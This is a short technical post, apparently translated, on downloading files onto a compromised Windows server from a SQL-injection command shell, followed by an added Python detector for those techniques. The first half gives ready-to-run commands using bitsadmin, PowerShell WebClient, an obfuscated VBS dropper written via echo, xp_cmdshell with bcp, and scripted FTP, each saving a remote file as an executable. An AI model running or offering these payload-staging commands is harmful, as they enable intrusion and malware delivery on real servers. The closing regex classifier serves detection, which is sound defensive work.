This post records some methods of downloading a file from a cmdshell, for example from an injection point that runs with sa privileges.
0x1 bitsadmin

```cmd
bitsadmin /transfer n /download /priority normal http://img.firefoxchina.cn/2016/01/7/201601251124490.png C:\test.exe
```

Check first whether the C: drive is writable.
0x2 powershell

```cmd
powershell -command "(new-object System.Net.WebClient).DownloadFile('http://img.firefoxchina.cn/2016/01/7/201601251124490.png', 'C:\test.exe')"
```

Requires PowerShell to be available on the server.
0x3 VBS download

```cmd
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^","http://img.firefoxchina.cn/2016/01/7/201601251124490.png",0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile "c:\test.exe",2 >> c:\d.vbs
```
0x4 Exporting a file with SQL Server

```sql
drop table test1
create table test1(c char(1000))
insert into test1(c)values((select CONVERT(varchar(64),0x74657374,0)))
EXEC master..xp_cmdshell 'BCP "select * from test.dbo.test1" queryout c:\tset.exe -c -T '
```
0x5 FTP download

```cmd
ftp -s:download.txt
```

Contents of download.txt:

```
open [host]
[username]
[password]
bin
lcd [local path]
get [filename]
bye
```
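From the defender's side, every method above leaves a distinctive process command line (bitsadmin with /transfer and /download, powershell with WebClient.DownloadFile, an echo that writes an ADODB.Stream/XMLHTTP script into a .vbs file, bcp with queryout writing an executable, ftp with -s:). The following is an added example, not code from the original post: a small Python classifier that normalises the caret escapes and string splitting used in the VBS one-liner and then matches each technique. The rule names and the sample command lines are constructed for this illustration.

```python
import re

# Constructed sample process-creation command lines (not from the original post).
SAMPLE_COMMAND_LINES = [
    r'bitsadmin /transfer n /download /priority normal http://example.invalid/a.png C:\test.exe',
    r'''powershell -command "(new-object System.Net.WebClient).DownloadFile('http://example.invalid/a.png', 'C:\test.exe')"''',
    r'cmd.exe /c echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^") >> c:\d.vbs',
    r'bcp "select * from test.dbo.test1" queryout c:\tset.exe -c -T',
    r'ftp -s:download.txt',
    # benign look-alikes that must not fire
    r'bitsadmin /list',
    r'powershell -command "Get-Process"',
    r'ftp ftp.example.invalid',
]

# Hypothetical rule names paired with the pattern that identifies each technique.
RULES = [
    ("bitsadmin_download",
     re.compile(r'bitsadmin.*/transfer.*/download', re.I)),
    ("powershell_webclient_download",
     re.compile(r'powershell.*(webclient|downloadfile|downloadstring)', re.I)),
    ("vbs_xmlhttp_dropper",
     re.compile(r'echo.*(adodb\.stream|microsoft\.xmlhttp|msxml2\.xmlhttp).*>>?.*\.vbs', re.I)),
    ("bcp_queryout_export",
     re.compile(r'\bbcp\b.*queryout.*\.(exe|dll|vbs|ps1)\b', re.I)),
    ("ftp_scripted_session",
     re.compile(r'\bftp(\.exe)?\b.*-s:', re.I)),
]


def normalize(cmdline: str) -> str:
    """Undo the two evasions seen in the VBS one-liner: cmd.exe caret escapes
    and splitting a keyword across "adod"+"b.stream" style concatenation."""
    s = cmdline.replace('^', '')
    s = re.sub(r'"\s*\+\s*"', '', s)
    s = re.sub(r"'\s*\+\s*'", '', s)
    return s


def classify(cmdline: str) -> list[str]:
    """Return the names of every rule the (normalised) command line matches."""
    text = normalize(cmdline)
    return [name for name, rx in RULES if rx.search(text)]


def scan(lines) -> list[tuple[str, list[str]]]:
    """Keep only the command lines that match at least one rule."""
    hits = []
    for line in lines:
        labels = classify(line)
        if labels:
            hits.append((line, labels))
    return hits


if __name__ == "__main__":
    for line, labels in scan(SAMPLE_COMMAND_LINES):
        print(", ".join(labels), "<-", line)
```

Matching on the normalised form is what matters: the caret and concatenation tricks in the echo one-liner defeat a naive substring search for `adodb.stream`, so the normaliser strips them before the rules run. The patterns deliberately require the download-specific argument (`/download`, `DownloadFile`, `queryout`, `-s:`) so that ordinary administrative use of the same binaries does not fire.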
Thanks to darkray and hrayha; additions are welcome.